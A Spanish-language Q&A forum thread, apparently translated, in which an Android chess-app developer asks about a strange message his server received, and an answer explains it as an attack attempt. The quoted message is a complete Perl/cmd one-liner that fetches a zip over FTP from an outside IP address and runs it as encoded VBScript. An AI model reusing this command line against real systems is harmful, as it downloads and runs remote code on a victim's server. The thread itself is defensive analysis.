Recibí en mi servidor un mensaje que podría ser de un hacker

Tengo una aplicación de ajedrez en línea hecha en Android.

Supervise todos los mensajes que el servidor recibe después de que el cliente ha llamado .accept() y leí el BufferedReader() .

Hace poco recibí un mensaje muy extraño de un usuario desconocido, que no coincide en absoluto con el formato de mensaje habitual que obtengo.

Esto fue lo que el servidor recibió:

 ?2 28 \perl.exe -esystem('cmd.exe /c echo bin>f&echo get azb.zip %temp%\\z.zip>>f&echo bye>>f&ftp -A -s:f 112.213.127.52 &cscript.exe /b /e:VBScript.Encode %temp%\\z.zip 579562847 macu://58.238.143.25:88/h') 

¿Alguien tiene alguna idea de qué es esto? Y si es peligroso, ¿qué puedo hacer?

De hecho, esto parece un ataque (o un intento). Si divido la línea, termino con lo siguiente:

El "individuo" intenta ejecutar algún código en su servidor. Primero crea un archivo llamado f con el siguiente contenido:

 bin get azb.zip %temp%\z.zip bye 

Entonces ejecuta el comando ftp con ese archivo como entrada, es decir, se conecta a 112.213.127.52 y recupera el archivo azb.zip y lo almacena localmente (en su servidor) como %temp%\z.zip

Finalmente se ejecuta

 cscript.exe /b /e:VBScript.Encode %temp%\z.zip 579562847 macu://58.238.143.25:88/h 

El fragmento completo está envuelto en un perl one-liner. La función system() Perl simplemente ejecuta el comando externo dado a ella, en este caso el cmd.exe . Creo que es hecho porque es muy improbable que su servidor ejecute cmd.exe pero puede ejecutar perl porque perl se utiliza con frecuencia para scripts de servidor (por ejemplo, scripts cgi).

Las buenas noticias son: Esto funcionará sólo si se cumplen todas las condiciones siguientes:

  • Su servidor debe tener instalado perl.exe
  • Debe tener cmd.exe instalado
  • Debe tener cscript.exe instalado
  • Debe interpretar %temp% correctamente
  • Lo más importante: su servidor y su aplicación del lado del servidor deben estar configurados para ejecutar código arbitrario que fue dado a través de una solicitud GET, lo cual no es muy probable.

Este sitio web dice que la dirección 58.238.143.25 es de Corea del Sur y 112.213.127.52 es de Hong Kong.

No me importaría. Se trata de un ataque para servidores basados ​​en Windows. ¿Es tuyo?

  • Android: tiene problemas para administrar puntos finales de servidor en el cliente de aplicaciones
  • FlipAndroid es un fan de Google para Android, Todo sobre Android Phones, Android Wear, Android Dev y Aplicaciones para Android Aplicaciones.